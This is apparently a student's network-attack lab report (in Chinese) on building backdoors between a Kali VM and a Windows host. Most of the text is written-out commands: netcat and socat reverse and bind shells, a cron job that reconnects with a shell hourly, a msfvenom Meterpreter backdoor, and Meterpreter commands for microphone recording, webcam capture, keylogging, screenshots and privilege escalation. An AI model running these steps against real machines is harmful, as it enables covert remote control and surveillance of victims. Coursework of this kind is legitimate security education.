ipconfig查看本机IP
ncat.exe -l -p 5318
ncat 169.254.175.85 5318 -e /bin/sh,使用-e选项执行shell程序

ifconfig查看IP
nc -l -p 5318
ncat.exe -e cmd.exe 192.168.208.129 5318

Windows下监听5318端口,ncat.exe -l 5318
kali反弹连接到Windows的5318端口,nc 169.254.175.85 5318
连接建立成功,双方可以相互传输数据

Windows下监听5318端口,并把收到的数据保存到file1.out中,ncat.exe -l 5318 > file1.out
kali反弹连接到Windows的5318端口,nc 169.254.175.85 5318 < file1.in
连接建立成功,Win可以收到kali发来的文件。

> 输出到哪个文件Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。详细说明可以"man cron"。
在Windows系统下,监听5318端口
在Kali环境下,用crontab -e指令编辑一条定时任务,(crontab指令增加一条定时任务,"-e"表示编辑)选择编辑器时选择3(第一次会提示选择编辑器,以后就不会提示了);
在最后一行添加26 * * * * /bin/netcat 169.254.175.85 5318 -e /bin/sh,意思是在每个小时的第26分钟反向连接Windows主机的5318端口,设置成26的原因是我当时的时间是16点24,为了能立马看到效果,所以我将时间设置成了26;


socat:
- socat是ncat的增强版,它使用的格式是socat [options] <address> <address>,其中两个address是必选项,而options 是可选项。
- socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。
搜索打开“计算机管理”
在“任务计划程序”中“创建任务”

https://images2018.cnblogs.com/blog/1071476/201803
/1071476-20180328210311123-1041484837.png
socat.exe文件的路径,在添加参数一栏填写tcp-listen:5318 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5318,同时把cmd.exe的stderr重定向到stdout上:

socat - tcp:169.254.175.85:5318,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5318端口,此时可以发现已经成功获得了一个cmd shell
在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.208.129 LPORT=5318 -f exe > 20165318_backdoor.exe,注意这里的IP地址为控制端IP,即LinuxIP,可见已经生成了后门程序“20165318_backdoor.exe”

在Windows下执行ncat.exe -l 5318 > 20165318_backdoor.exe,这样被控主机就进入了接收文件模式,也可以使用ncat.exe -lv 5318 > 20165318_backdoor.exe指令,通过-lv选项看到当前的连接状态,下面这个图是文件传输成功的截图

在Linux中执行nc 169.254.175.85 5318 < 20165318_backdoor.exe,注意这里的IP为被控主机IP,即WindowsIP
传送接收文件成功,如下图所示

在Kali上使用msfconsole指令进入msf控制台,这时候我们能看到一个可爱的小人~而且每次打开都是不一样的图案!

输入use exploit/multi/handler使用监听模块,设置payload
set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payload
set LHOST 192.168.208.129,这里用的是LinuxIP,和生成后门程序时指定的IP相同
set LPORT 5318,同样要使用相同的端口

设置完成后,执行监听

运行Windows下的后门程序

此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell

使用record_mic指令可以截获一段音频,可以用-d选项设置录制时间

使用webcam_snap指令可以使用摄像头进行拍照

使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录

使用screenshot指令可以进行截屏,效果如下:

先使用getuid指令查看当前用户,使用getsystem指令进行提权

也可以用webcam stream指令可以使用摄像头进行录像
暂时还没有做出来,后期会继续跟进
本次实验由于我提前关闭了防火墙,在实验过程中没有遇到什么问题。
2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践
原文:https://www.cnblogs.com/sunxiaoxuan/p/10559284.html